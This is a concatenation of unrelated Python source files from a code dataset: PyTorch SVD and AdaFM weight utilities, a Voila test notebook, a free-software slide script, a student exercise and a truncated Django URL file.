print('shape of FC:', NUM2)
v_new = torch.mm(torch.mm(Ua[:, :NUM2], torch.diag(Sa[:NUM2])), Va[:, :NUM2].t())
dict_all[k] = v_new.unsqueeze(2).unsqueeze(3)
model_dict.update(dict_all)
model.load_state_dict(model_dict)
return model
transform = transforms.Compose([
transforms.Resize(32),
transforms.CenterCrop(32),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
transforms.Lambda(lambda x: x + 1./128 * torch.rand(x.size())),
])
def svd_all_layers(dict_G, FRAC=0.9):
flower_gamma_U, flower_gamma_S, flower_gamma_V = [], [], []
flower_beta_U, flower_beta_S, flower_beta_V = [], [], []
for k, v in dict_G.items():
if k.find('AdaFM') >= 0 and k.find('style_gama') >= 0:
# print('shape of FC:', v.shape)
Ua, Sa, Va = (v - 1.).squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
ii_acsum = ii.cumsum(dim=0)
NUM = (1 - (ii_acsum / ii_acsum[-1] >= FRAC)).sum() + 1
flower_gamma_U.append(Ua[:, :NUM])
flower_gamma_S.append(Sa[:NUM])
flower_gamma_V.append(Va[:, :NUM])
elif k.find('AdaFM') >= 0 and k.find('style_beta') >= 0:
Ua, Sa, Va = v.squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
ii_acsum = ii.cumsum(dim=0)
NUM = (1 - (ii_acsum / ii_acsum[-1] >= FRAC)).sum() + 1
flower_beta_U.append(Ua[:, :NUM])
flower_beta_S.append(Sa[:NUM])
flower_beta_V.append(Va[:, :NUM])
return flower_gamma_U, flower_gamma_S, flower_gamma_V, flower_beta_U, flower_beta_S, flower_beta_V
def gamma_beta_all_layers(dict_G):
flower_gamma = []
flower_beta = []
for k, v in dict_G.items():
if k.find('AdaFM') >= 0 and k.find('style_gama') >= 0:
# print('shape of FC:', v.shape)
flower_gamma.append(v.squeeze())
elif k.find('AdaFM') >= 0 and k.find('style_beta') >= 0:
flower_beta.append(v.squeeze())
return flower_gamma, flower_beta
def cumpute_atc_num(generator_test, para='gamma', task=0, num_task=6):
num_task = num_task - 1
if para == 'gamma':
act_gamma_t1 = \
[generator_test.resnet_0_0.AdaFM_0.global_gamma_s[num_task][task].shape[0],
generator_test.resnet_0_0.AdaFM_1.global_gamma_s[num_task][task].shape[0],
generator_test.resnet_1_0.AdaFM_0.global_gamma_s[num_task][task].shape[0],
generator_test.resnet_1_0.AdaFM_1.global_gamma_s[num_task][task].shape[0],
generator_test.resnet_2_0.AdaFM_0.global_gamma_s[num_task][task].shape[0],
generator_test.resnet_2_0.AdaFM_1.global_gamma_s[num_task][task].shape[0],
generator_test.resnet_3_0.AdaFM_0.global_gamma_s[num_task][task].shape[0],
generator_test.resnet_3_0.AdaFM_1.global_gamma_s[num_task][task].shape[0],
generator_test.resnet_4_0.AdaFM_0.global_gamma_s[num_task][task].shape[0],
generator_test.resnet_4_0.AdaFM_1.global_gamma_s[num_task][task].shape[0],
generator_test.resnet_5_0.AdaFM_0.global_gamma_s[num_task][task].shape[0],
generator_test.resnet_5_0.AdaFM_1.global_gamma_s[num_task][task].shape[0],
generator_test.resnet_6_0.AdaFM_0.global_gamma_s[num_task][task].shape[0],
generator_test.resnet_6_0.AdaFM_1.global_gamma_s[num_task][task].shape[0],
]
elif para == 'beta':
act_gamma_t1 = \
[generator_test.resnet_0_0.AdaFM_0.global_beta_s[num_task][task].shape[0],
generator_test.resnet_0_0.AdaFM_1.global_beta_s[num_task][task].shape[0],
generator_test.resnet_1_0.AdaFM_0.global_beta_s[num_task][task].shape[0],
generator_test.resnet_1_0.AdaFM_1.global_beta_s[num_task][task].shape[0],
generator_test.resnet_2_0.AdaFM_0.global_beta_s[num_task][task].shape[0],
generator_test.resnet_2_0.AdaFM_1.global_beta_s[num_task][task].shape[0],
generator_test.resnet_3_0.AdaFM_0.global_beta_s[num_task][task].shape[0],
generator_test.resnet_3_0.AdaFM_1.global_beta_s[num_task][task].shape[0],
generator_test.resnet_4_0.AdaFM_0.global_beta_s[num_task][task].shape[0],
generator_test.resnet_4_0.AdaFM_1.global_beta_s[num_task][task].shape[0],
generator_test.resnet_5_0.AdaFM_0.global_beta_s[num_task][task].shape[0],
generator_test.resnet_5_0.AdaFM_1.global_beta_s[num_task][task].shape[0],
generator_test.resnet_6_0.AdaFM_0.global_beta_s[num_task][task].shape[0],
generator_test.resnet_6_0.AdaFM_1.global_beta_s[num_task][task].shape[0],
]
return act_gamma_t1
def cumpute_atc_num_v2(generator_test, para='gamma', task=0, num_task=6):
num_task = num_task - 1
if para == 'gamma':
act_gamma_t1 = \
[generator_test.resnet_0_0.AdaFM_0.global_num_gamma[task].cpu().data,
generator_test.resnet_0_0.AdaFM_1.global_num_gamma[task].cpu().data,
generator_test.resnet_1_0.AdaFM_0.global_num_gamma[task].cpu().data,
generator_test.resnet_1_0.AdaFM_1.global_num_gamma[task].cpu().data,
generator_test.resnet_2_0.AdaFM_0.global_num_gamma[task].cpu().data,
generator_test.resnet_2_0.AdaFM_1.global_num_gamma[task].cpu().data,
generator_test.resnet_3_0.AdaFM_0.global_num_gamma[task].cpu().data,
generator_test.resnet_3_0.AdaFM_1.global_num_gamma[task].cpu().data,
generator_test.resnet_4_0.AdaFM_0.global_num_gamma[task].cpu().data,
generator_test.resnet_4_0.AdaFM_1.global_num_gamma[task].cpu().data,
generator_test.resnet_5_0.AdaFM_0.global_num_gamma[task].cpu().data,
generator_test.resnet_5_0.AdaFM_1.global_num_gamma[task].cpu().data,
generator_test.resnet_6_0.AdaFM_0.global_num_gamma[task].cpu().data,
generator_test.resnet_6_0.AdaFM_1.global_num_gamma[task].cpu().data,
]
elif para == 'beta':
act_gamma_t1 = \
[generator_test.resnet_0_0.AdaFM_0.global_num_beta[task].cpu().data,
generator_test.resnet_0_0.AdaFM_1.global_num_beta[task].cpu().data,
generator_test.resnet_1_0.AdaFM_0.global_num_beta[task].cpu().data,
generator_test.resnet_1_0.AdaFM_1.global_num_beta[task].cpu().data,
generator_test.resnet_2_0.AdaFM_0.global_num_beta[task].cpu().data,
generator_test.resnet_2_0.AdaFM_1.global_num_beta[task].cpu().data,
generator_test.resnet_3_0.AdaFM_0.global_num_beta[task].cpu().data,
generator_test.resnet_3_0.AdaFM_1.global_num_beta[task].cpu().data,
generator_test.resnet_4_0.AdaFM_0.global_num_beta[task].cpu().data,
generator_test.resnet_4_0.AdaFM_1.global_num_beta[task].cpu().data,
generator_test.resnet_5_0.AdaFM_0.global_num_beta[task].cpu().data,
generator_test.resnet_5_0.AdaFM_1.global_num_beta[task].cpu().data,
generator_test.resnet_6_0.AdaFM_0.global_num_beta[task].cpu().data,
generator_test.resnet_6_0.AdaFM_1.global_num_beta[task].cpu().data,
]
return act_gamma_t1
def get_parameter_num(model, task_id=0):
p_num = 0
p_num += model.AdaFM_fc.gamma.shape[1] + model.AdaFM_fc.beta.shape[1] + model.AdaFM_fc.b.shape[0]
h1 = model.resnet_0_0.AdaFM_0.global_gamma_u[0].shape[0]
w1 = model.resnet_0_0.AdaFM_0.global_num_gamma[task_id].cpu().data
h2 = model.resnet_0_0.AdaFM_0.global_beta_u[0].shape[0]
w2 = model.resnet_0_0.AdaFM_0.global_num_beta[task_id].cpu().data
c = model.resnet_0_0.AdaFM_0.b.shape[0]
p_num += 2*h1*w1 + w1 + 2*h2*w2 + w2 +c
h1 = model.resnet_0_0.AdaFM_1.global_gamma_u[0].shape[0]
w1 = model.resnet_0_0.AdaFM_1.global_num_gamma[task_id].cpu().data
h2 = model.resnet_0_0.AdaFM_1.global_beta_u[0].shape[0]
w2 = model.resnet_0_0.AdaFM_1.global_num_beta[task_id].cpu().data
c = model.resnet_0_0.AdaFM_1.b.shape[0]
p_num += 2*h1*w1 + w1 + 2*h2*w2 + w2 + c
h1 = model.resnet_1_0.AdaFM_0.global_gamma_u[0].shape[0]
w1 = model.resnet_1_0.AdaFM_0.global_num_gamma[task_id].cpu().data
h2 = model.resnet_1_0.AdaFM_0.global_beta_u[0].shape[0]
w2 = model.resnet_1_0.AdaFM_0.global_num_beta[task_id].cpu().data
c = model.resnet_1_0.AdaFM_0.b.shape[0]
p_num += 2*h1*w1 + w1 + 2*h2*w2 + w2 + c
h1 = model.resnet_1_0.AdaFM_1.global_gamma_u[0].shape[0]
w1 = model.resnet_1_0.AdaFM_1.global_num_gamma[task_id].cpu().data
h2 = model.resnet_1_0.AdaFM_1.global_beta_u[0].shape[0]
w2 = model.resnet_1_0.AdaFM_1.global_num_beta[task_id].cpu().data
c = model.resnet_1_0.AdaFM_1.b.shape[0]
p_num += 2*h1*w1 + w1 + 2*h2*w2 + w2 + c
h1 = model.resnet_2_0.AdaFM_0.global_gamma_u[0].shape[0]
w1 = model.resnet_2_0.AdaFM_0.global_num_gamma[task_id].cpu().data
h2 = model.resnet_2_0.AdaFM_0.global_beta_u[0].shape[0]
w2 = model.resnet_2_0.AdaFM_0.global_num_beta[task_id].cpu().data
c = model.resnet_2_0.AdaFM_0.b.shape[0]
p_num += 2*h1*w1 + w1 + 2*h2*w2 + w2 + c
h1 = model.resnet_2_0.AdaFM_1.global_gamma_u[0].shape[0]
w1 = model.resnet_2_0.AdaFM_1.global_num_gamma[task_id].cpu().data
h2 = model.resnet_2_0.AdaFM_1.global_beta_u[0].shape[0]
w2 = model.resnet_2_0.AdaFM_1.global_num_beta[task_id].cpu().data
c = model.resnet_2_0.AdaFM_1.b.shape[0]
p_num += 2*h1*w1 + w1 + 2*h2*w2 + w2 + c
h1 = model.resnet_3_0.AdaFM_0.global_gamma_u[0].shape[0]
w1 = model.resnet_3_0.AdaFM_0.global_num_gamma[task_id].cpu().data
h2 = model.resnet_3_0.AdaFM_0.global_beta_u[0].shape[0]
w2 = model.resnet_3_0.AdaFM_0.global_num_beta[task_id].cpu().data
c = model.resnet_3_0.AdaFM_0.b.shape[0]
p_num += 2*h1*w1 + w1 + 2*h2*w2 + w2 + c
h1 = model.resnet_3_0.AdaFM_1.global_gamma_u[0].shape[0]
w1 = model.resnet_3_0.AdaFM_1.global_num_gamma[task_id].cpu().data
h2 = model.resnet_3_0.AdaFM_1.global_beta_u[0].shape[0]
w2 = model.resnet_3_0.AdaFM_1.global_num_beta[task_id].cpu().data
c = model.resnet_3_0.AdaFM_1.b.shape[0]
p_num += 2*h1*w1 + w1 + 2*h2*w2 + w2 + c
h1 = model.resnet_4_0.AdaFM_0.global_gamma_u[0].shape[0]
w1 = model.resnet_4_0.AdaFM_0.global_num_gamma[task_id].cpu().data
h2 = model.resnet_4_0.AdaFM_0.global_beta_u[0].shape[0]
w2 = model.resnet_4_0.AdaFM_0.global_num_beta[task_id].cpu().data
c = model.resnet_4_0.AdaFM_0.b.shape[0]
p_num += 2*h1*w1 + w1 + 2*h2*w2 + w2 + c
h1 = model.resnet_4_0.AdaFM_1.global_gamma_u[0].shape[0]
w1 = model.resnet_4_0.AdaFM_1.global_num_gamma[task_id].cpu().data
h2 = model.resnet_4_0.AdaFM_1.global_beta_u[0].shape[0]
w2 = model.resnet_4_0.AdaFM_1.global_num_beta[task_id].cpu().data
c = model.resnet_4_0.AdaFM_1.b.shape[0]
p_num += 2*h1*w1 + w1 + 2*h2*w2 + w2 + c
h1 = model.resnet_5_0.AdaFM_0.global_gamma_u[0].shape[0]
w1 = model.resnet_5_0.AdaFM_0.global_num_gamma[task_id].cpu().data
h2 = model.resnet_5_0.AdaFM_0.global_beta_u[0].shape[0]
w2 = model.resnet_5_0.AdaFM_0.global_num_beta[task_id].cpu().data
c = model.resnet_5_0.AdaFM_0.b.shape[0]
p_num += 2*h1*w1 + w1 + 2*h2*w2 + w2 + c
h1 = model.resnet_5_0.AdaFM_1.global_gamma_u[0].shape[0]
w1 = model.resnet_5_0.AdaFM_1.global_num_gamma[task_id].cpu().data
h2 = model.resnet_5_0.AdaFM_1.global_beta_u[0].shape[0]
w2 = model.resnet_5_0.AdaFM_1.global_num_beta[task_id].cpu().data
c = model.resnet_5_0.AdaFM_1.b.shape[0]
p_num += 2*h1*w1 + w1 + 2*h2*w2 + w2 + c
h1 = model.resnet_6_0.AdaFM_0.global_gamma_u[0].shape[0]
w1 = model.resnet_6_0.AdaFM_0.global_num_gamma[task_id].cpu().data
h2 = model.resnet_6_0.AdaFM_0.global_beta_u[0].shape[0]
w2 = model.resnet_6_0.AdaFM_0.global_num_beta[task_id].cpu().data
c = model.resnet_6_0.AdaFM_0.b.shape[0]
p_num += 2*h1*w1 + w1 + 2*h2*w2 + w2 + c
h1 = model.resnet_6_0.AdaFM_1.global_gamma_u[0].shape[0]
w1 = model.resnet_6_0.AdaFM_1.global_num_gamma[task_id].cpu().data
h2 = model.resnet_6_0.AdaFM_1.global_beta_u[0].shape[0]
w2 = model.resnet_6_0.AdaFM_1.global_num_beta[task_id].cpu().data
c = model.resnet_6_0.AdaFM_1.b.shape[0]
p_num += 2*h1*w1 + w1 + 2*h2*w2 + w2 + c
return p_num
def load_model_norm(model, is_G=True, is_classCondition=False):
th_m = torch.tensor(1e-5)
stdd = 1.0
dict_all = model.state_dict()
model_dict = model.state_dict()
for k, v in dict_all.items():
if is_G==True:
if k.find('fc.weight') >= 0:
w_mu = v.mean([1], keepdim=True)
w_std = v.std([1], keepdim=True) * stdd
dict_all[k].data = (v - w_mu)/(w_std)
dict_all['AdaFM_fc.gamma'].data = w_std.data.t()
dict_all['AdaFM_fc.beta'].data = w_mu.data.t()
idt = k.find('conv_0.weight')
if idt >= 0:
w_mu = v.mean([2,3], keepdim=True)
w_std = v.std([2,3], keepdim=True) * stdd
dict_all[k].data = (v - w_mu)/(w_std)
dict_all[k[:idt]+'AdaFM_0.style_gama'].data = w_std.data
dict_all[k[:idt]+'AdaFM_0.style_beta'].data = w_mu.data
idt = k.find('conv_1.weight')
if idt >= 0:
w_mu = v.mean([2, 3], keepdim=True)
w_std = v.std([2, 3], keepdim=True) * stdd
dict_all[k].data = (v - w_mu)/(w_std)
dict_all[k[:idt] + 'AdaFM_1.style_gama'].data = w_std.data
dict_all[k[:idt] + 'AdaFM_1.style_beta'].data = w_mu.data
if is_classCondition:
if k.find('AdaFM_class_bias.weight') >= 0:
dict_all[k].data = v*0.0
model_dict.update(dict_all)
model.load_state_dict(model_dict)
return model
def load_model_norm_svd(model, is_G=True, is_first_task=True):
# for the first task
dict_all = model.state_dict()
model_dict = model.state_dict()
for k, v in dict_all.items():
if is_G == True:
if k.find('fc.weight') >= 0:
w_mu = v.mean([1], keepdim=True)
w_std = v.std([1], keepdim=True)
dict_all[k].data = (v - w_mu) / (w_std)
dict_all['AdaFM_fc.gamma'].data = w_std.data.t()
dict_all['AdaFM_fc.beta'].data = w_mu.data.t()
idt = k.find('conv_0.weight')
if idt >= 0:
w_mu = v.mean([2, 3], keepdim=True)
w_std = v.std([2, 3], keepdim=True)
dict_all[k].data = (v - w_mu) / (w_std)
real_rank = howMny_componetes(v.shape[0])
# gamma
Ua, Sa, Va = w_std.data.squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
dict_all[k[:idt] + 'AdaFM_0.gamma_u'].data = Ua[:, jj[:real_rank]].data
dict_all[k[:idt] + 'AdaFM_0.gamma_v'].data = Va[:, jj[:real_rank]].data
if is_first_task:
dict_all[k[:idt] + 'AdaFM_0.gamma_s2'].data = Sa[jj[:real_rank]].data
Ua, Sa, Va = w_mu.data.squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
dict_all[k[:idt] + 'AdaFM_0.beta_u'].data = Ua[:, jj[:real_rank]].data
dict_all[k[:idt] + 'AdaFM_0.beta_v'].data = Va[:, jj[:real_rank]].data
if is_first_task:
dict_all[k[:idt] + 'AdaFM_0.beta_s2'].data = Sa[jj[:real_rank]].data
idt = k.find('conv_1.weight')
if idt >= 0:
w_mu = v.mean([2, 3], keepdim=True)
w_std = v.std([2, 3], keepdim=True)
dict_all[k].data = (v - w_mu) / (w_std)
real_rank = howMny_componetes(v.shape[0])
# gamma
Ua, Sa, Va = w_std.data.squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
dict_all[k[:idt] + 'AdaFM_1.gamma_u'].data = Ua[:, jj[:real_rank]].data
dict_all[k[:idt] + 'AdaFM_1.gamma_v'].data = Va[:, jj[:real_rank]].data
if is_first_task:
dict_all[k[:idt] + 'AdaFM_1.gamma_s2'].data = Sa[jj[:real_rank]].data
Ua, Sa, Va = w_mu.data.squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
dict_all[k[:idt] + 'AdaFM_1.beta_u'].data = Ua[:, jj[:real_rank]].data
dict_all[k[:idt] + 'AdaFM_1.beta_v'].data = Va[:, jj[:real_rank]].data
if is_first_task:
dict_all[k[:idt] + 'AdaFM_1.beta_s2'].data = Sa[jj[:real_rank]].data
model_dict.update(dict_all)
model.load_state_dict(model_dict)
return model
def load_model_norm_svd_S100(model, is_G=True, is_first_task=True):
# for the first task
S_scale_g, S_scale_b = 100.0, 20.0
dict_all = model.state_dict()
model_dict = model.state_dict()
for k, v in dict_all.items():
if is_G == True:
if k.find('fc.weight') >= 0:
w_mu = v.mean([1], keepdim=True)
w_std = v.std([1], keepdim=True)
dict_all[k].data = (v - w_mu) / (w_std)
dict_all['AdaFM_fc.gamma'].data = w_std.data.t()
dict_all['AdaFM_fc.beta'].data = w_mu.data.t()
idt = k.find('conv_0.weight')
if idt >= 0:
w_mu = v.mean([2, 3], keepdim=True)
w_std = v.std([2, 3], keepdim=True)
dict_all[k].data = (v - w_mu) / (w_std)
real_rank = howMny_componetes(v.shape[0])
# gamma
Ua, Sa, Va = w_std.data.squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
dict_all[k[:idt] + 'AdaFM_0.gamma_u'].data = Ua[:, jj[:real_rank]].data
dict_all[k[:idt] + 'AdaFM_0.gamma_v'].data = Va[:, jj[:real_rank]].data
if is_first_task:
dict_all[k[:idt] + 'AdaFM_0.gamma_s2'].data = Sa[jj[:real_rank]].data / S_scale_g
Ua, Sa, Va = w_mu.data.squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
dict_all[k[:idt] + 'AdaFM_0.beta_u'].data = Ua[:, jj[:real_rank]].data
dict_all[k[:idt] + 'AdaFM_0.beta_v'].data = Va[:, jj[:real_rank]].data
if is_first_task:
dict_all[k[:idt] + 'AdaFM_0.beta_s2'].data = Sa[jj[:real_rank]].data / S_scale_b
idt = k.find('conv_1.weight')
if idt >= 0:
w_mu = v.mean([2, 3], keepdim=True)
w_std = v.std([2, 3], keepdim=True)
dict_all[k].data = (v - w_mu) / (w_std)
real_rank = howMny_componetes(v.shape[0])
# gamma
Ua, Sa, Va = w_std.data.squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
dict_all[k[:idt] + 'AdaFM_1.gamma_u'].data = Ua[:, jj[:real_rank]].data
dict_all[k[:idt] + 'AdaFM_1.gamma_v'].data = Va[:, jj[:real_rank]].data
if is_first_task:
dict_all[k[:idt] + 'AdaFM_1.gamma_s2'].data = Sa[jj[:real_rank]].data / S_scale_g
Ua, Sa, Va = w_mu.data.squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
dict_all[k[:idt] + 'AdaFM_1.beta_u'].data = Ua[:, jj[:real_rank]].data
dict_all[k[:idt] + 'AdaFM_1.beta_v'].data = Va[:, jj[:real_rank]].data
if is_first_task:
dict_all[k[:idt] + 'AdaFM_1.beta_s2'].data = Sa[jj[:real_rank]].data / S_scale_b
model_dict.update(dict_all)
model.load_state_dict(model_dict)
return model
def load_model_norm_svd_AR(model, dict_all, is_G=True, is_first_task=True):
# for the first task
model_dict = model.state_dict()
dic_choose = {k: v for k, v in dict_all.items() if
k in model_dict and (k.find('AdaFM_0') == -1 or k.find('AdaFM_1') == -1)}
for k, v in dict_all.items():
if k in model_dict:
model_dict[k].data = v.data
idt = k.find('conv_0.weight')
if idt >= 0:
real_rank = howMny_componetes(v.shape[0])
# gamma
Ua, Sa, Va = dict_all[k[:idt] + 'AdaFM_0.style_gama'].data.squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
model_dict[k[:idt] + 'AdaFM_0.gamma_u'].data = Ua[:, jj[:real_rank]].data
model_dict[k[:idt] + 'AdaFM_0.gamma_v'].data = Va[:, jj[:real_rank]].data
if is_first_task:
model_dict[k[:idt] + 'AdaFM_0.gamma_s2'].data = Sa[jj[:real_rank]].data
Ua, Sa, Va = dict_all[k[:idt] + 'AdaFM_0.style_beta'].data.squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
model_dict[k[:idt] + 'AdaFM_0.beta_u'].data = Ua[:, jj[:real_rank]].data
model_dict[k[:idt] + 'AdaFM_0.beta_v'].data = Va[:, jj[:real_rank]].data
if is_first_task:
model_dict[k[:idt] + 'AdaFM_0.beta_s2'].data = Sa[jj[:real_rank]].data
idt = k.find('conv_1.weight')
if idt >= 0:
real_rank = howMny_componetes(v.shape[0])
# gamma
Ua, Sa, Va = dict_all[k[:idt] + 'AdaFM_1.style_gama'].data.squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
model_dict[k[:idt] + 'AdaFM_1.gamma_u'].data = Ua[:, jj[:real_rank]].data
model_dict[k[:idt] + 'AdaFM_1.gamma_v'].data = Va[:, jj[:real_rank]].data
if is_first_task:
model_dict[k[:idt] + 'AdaFM_1.gamma_s2'].data = Sa[jj[:real_rank]].data
Ua, Sa, Va = dict_all[k[:idt] + 'AdaFM_1.style_beta'].data.squeeze().svd()
ii, jj = Sa.abs().sort(descending=True)
model_dict[k[:idt] + 'AdaFM_1.beta_u'].data = Ua[:, jj[:real_rank]].data
model_dict[k[:idt] + 'AdaFM_1.beta_v'].data = Va[:, jj[:real_rank]].data
if is_first_task:
model_dict[k[:idt] + 'AdaFM_1.beta_s2'].data = Sa[jj[:real_rank]].data
# model_dict.update(dict_all)
model.load_state_dict(model_dict)
return model
def chanel_percent(ch, p=[0.95, 0.9, 0.9, 0.8, 0.7]):
if ch == 64:
FRAC = p[0] #0.95
elif ch == 128:
FRAC = p[1] #0.9
elif ch==256:
FRAC = p[2] #0.9
elif ch == 512:
FRAC = p[3] #0.8
elif ch >= 1024:
FRAC = p[4] #0.7
return FRAC
def howMny_componetes(ch, is_beta=False, Def=[64, 128, 256, 512, 1024]):
#Def = [30, 50, 100, 200, 400]
if is_beta:
if ch == 64:
FRAC = Def[0]
elif ch == 128:
FRAC = Def[1]
elif ch == 256:
FRAC = Def[2]
elif ch == 512:
FRAC = Def[3]
elif ch == 1024:
FRAC = Def[4]
else:
if ch == 64:
FRAC = Def[0]
elif ch == 128:
FRAC = Def[1]
elif ch == 256:
FRAC = Def[2]
elif ch == 512:
FRAC = Def[3]
elif ch >= 1024:
FRAC = Def[4]
return FRAC
def my_copy(x):
return x.detach().data * 1.0
| [
"[email protected]"
]
| |
4c8f7e6ae2aeddd5c42226129d42c4cb4aab080a | 3ab599127dc2fc89cfee5f3ee3a91168499cb475 | /tests/notebooks/print.py | f53c6110196004fd9f0397077b033b4cca94f792 | [
"BSD-3-Clause"
]
| permissive | maartenbreddels/voila | 17dfb39c131ffad4b3b51926214dc71a2e06a964 | d3a52abdd34b68bdabdd8f0ae34071711cd16742 | refs/heads/master | 2022-05-11T05:47:44.843627 | 2020-09-28T09:58:37 | 2020-09-28T09:58:37 | 149,579,689 | 2 | 1 | NOASSERTION | 2020-05-27T07:59:20 | 2018-09-20T08:50:19 | Python | UTF-8 | Python | false | false | 284 | py | # ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.2.1
# kernelspec:
# display_name: Python 3
# language: python
# name: python
# ---
print('Hi Voilà!')
| [
"[email protected]"
]
| |
bb3d8a5f150df51b5fdef25b495d0d2462c6e144 | aae0461973440174afbf8e75e4ddf0f0c4dd1a9c | /gnu/gnu_slides.py | 1a30f50a3ee380b604a8669eeb4d4ef8b8b97991 | []
| no_license | behdad/slippy | f81eeac68df39eb0f6a7465effacd7239eb24cbf | 5535fe88a785dd75c96171b989f310fcd80e479e | refs/heads/master | 2023-08-29T08:48:40.919688 | 2016-09-27T08:02:01 | 2016-09-27T08:02:01 | 15,673,169 | 20 | 0 | null | 2014-01-10T08:09:47 | 2014-01-06T12:14:35 | Python | UTF-8 | Python | false | false | 5,180 | py | #!/usr/bin/python
# -*- coding:utf8 -*-
slides = []
def slide_add(f, data=None, width=800, height=400):
slides.append ((f, data, width, height))
return f
import pango
def text_slide (l):
def s (r):
for i in l:
yield i
for i in range (30):
yield ''
slide_add (s, data={'align': pango.ALIGN_LEFT})
texts = {}
texts['en'] = """“Free software” is a matter of liberty, not price. To understand the
concept, you should think of “free” as in “free speech”, not as in “free beer.”
Free software is a matter of the users' freedom to run, copy,
distribute, study, change and improve the software.
More precisely, it refers to four kinds of freedom, for the users of the
software:
------------------------------------------------------------------------------
0. The freedom to run the program, for any purpose.
1. The freedom to study how the program works, and adapt it to your needs.
Access to the source code is a precondition for this.
2. The freedom to redistribute copies so you can help your neighbor.
3. The freedom to improve the program, and release your improvements to
the public, so that the whole community benefits.
Access to the source code is a precondition for this.
------------------------------------------------------------------------------
The concept of these 4 freedoms (0-3) were developed by Richard Stallman.
To set a good example he started to write a completely free operating system.
Today Linux based GNU systems are used by millions of people around the world."""
texts['de'] = """Bei dem Begriff „Freie Software“ geht es um Freiheit, nicht um den Preis.
Um dieses Konzept richtig begreifen zu können, sollte man an „frei“ wie in
„freie Rede“ denken, und nicht an „Freibier“.
Bei „Freier Software“ geht es um die Freiheit des Benutzers die Software nach
Belieben zu benutzen, zu kopieren, weiter zu geben, die Software zu studieren,
sowie Änderungen und Verbesserungen an der Software vornehmen zu können.
------------------------------------------------------------------------------
Genauer gesagt, bezieht sich der Begriff „Freie Software“ auf vier Arten von
Freiheit, die der Benutzer der Software hat:
0. Die Freiheit, das Programm für jeden Zweck zu benutzen.
1. Die Freiheit, zu verstehen, wie das Programm funktioniert und wie man es
für seine Ansprüche anpassen kann.
Der Zugang zum Quellcode ist dafür Voraussetzung.
------------------------------------------------------------------------------
2. Die Freiheit, Kopien weiterzuverbreiten, so dass man seinem Nächsten
weiterhelfen kann.
3. Die Freiheit, das Programm zu verbessern und die Verbesserungen der
Allgemeinheit zur Verfügung zu stellen, damit die ganze Gemeinschaft davon
profitieren kann.
Der Zugang zum Quellcode ist dafür Voraussetzung.
------------------------------------------------------------------------------
Diese 4 Freiheiten (0-3) wurden so von Richard Stallman entworfen.
Um mit gutem Beispiel voran zu gehen, hat er angefangen, ein vollständig
freies Betriebssystem zu entwickeln.
Heute werden Linux basierte GNU Systeme von vielen Millionen Anwendern benutzt."""
texts['he'] = """"תוכנה חופשית" זה ענײן של חירות, לא של מחיר. כדי להבין את העקרון,
צריך לחשוב על "חופש" כמו ב"חופש הביטוי"...\
.effectpause
.back 3
ולא כמו ב"בירה חופשי".
תוכנה חופשית נוגעת לחופש של משתמשים להריץ, להפיץ הפצת-המשך, ללמוד,
לשנות ולשפר את התוכנה. ליתר דיוק, זה מתײחס לארבעה סוגים של חירות למשתמשי
התוכנה:
------------------------------------------------------------------------------
0. החופש להריץ את התוכנה, לכל מטרה שהיא.
1. החופש ללמוד איך תוכנה עובדת, ולשנות אותה לצרכיהם.
גישה לקוד המקור היא תנאי מקדים לכך.
2. החופש להפיץ עותקים בהפצה-חוזרת כדי שיוכלו למשל לעזור לשכנים שלהם.
3. החופש לשפר את התוכנה, ולשחרר את השיפורים שלהם לציבור, כך שכל הקהילה תרויח.
גישה לקוד-המקור היא תנאי מקדים לכך.
------------------------------------------------------------------------------
The concept of these 4 freedoms (0-3) were developed by Richard Stallman.
To set a good example he started to write a completely free operating system.
Today Linux based GNU systems are used by millions of people around the world."""
import os, re
lang = os.getenv ('LANG')
i = lang.find ('_')
if i > 0:
lang = lang[:i]
text = texts.get (lang, texts['en'])
def break_on_dashlines (text):
s = ''
for line in text.split ('\n'):
if re.match ('^----*$', line):
yield s
s = ''
else:
if s:
s += '\n'
s += line
yield s
for slide in break_on_dashlines (text):
text_slide (slide)
if __name__ == "__main__":
import slippy
import gnu_theme
slippy.main (slides, gnu_theme, args = ['--slideshow', '--delay', '0.05', '--repeat'])
| [
"[email protected]"
]
| |
f0b3710c6bf6eebf47cd69db345fc58831d7d39c | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/308/usersdata/295/73012/submittedfiles/ex1.py | d7faface2964c55c9b074fbe6eed286761f20fc3 | []
| no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 302 | py | # -*- coding: utf-8 -*-
from __future__ import division
a = input('Digite a: ')
b = input('Digite b: ')
c = input('Digite c: ')
#COMECE A PARTIR DAQUI!
a = input('Digite a: ')
b = input('Digite b: ')
c = input('Digite c: ')
f = a*(x**2) + b*x + c
if DH>0
print("X1 e X2")
else:
print("SRR")
| [
"[email protected]"
]
| |
b8664ce8a44166d29e61a75e3ca17132ba423261 | 76eb17916555462a9219cb7cfea741b2281ace7b | /testbot/urls.py | 8b8843e97dfa5a7526faad8d82ac7c207b0cbefc | [
"MIT"
]
| permissive | luungoc2005/chatbot_test | 6ecabbe507d01418282a883d6ab70eb10130c991 | f8c901c9c14a50727a7b514dda1e569c8180b458 | refs/heads/master | 2021-08-30T13:07:20.132250 | 2017-11-15T03:35:47 | 2017-11-15T03:35:47 | 105,901,223 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 229 | py | from django.urls import path
from . import views
urlpatterns = [
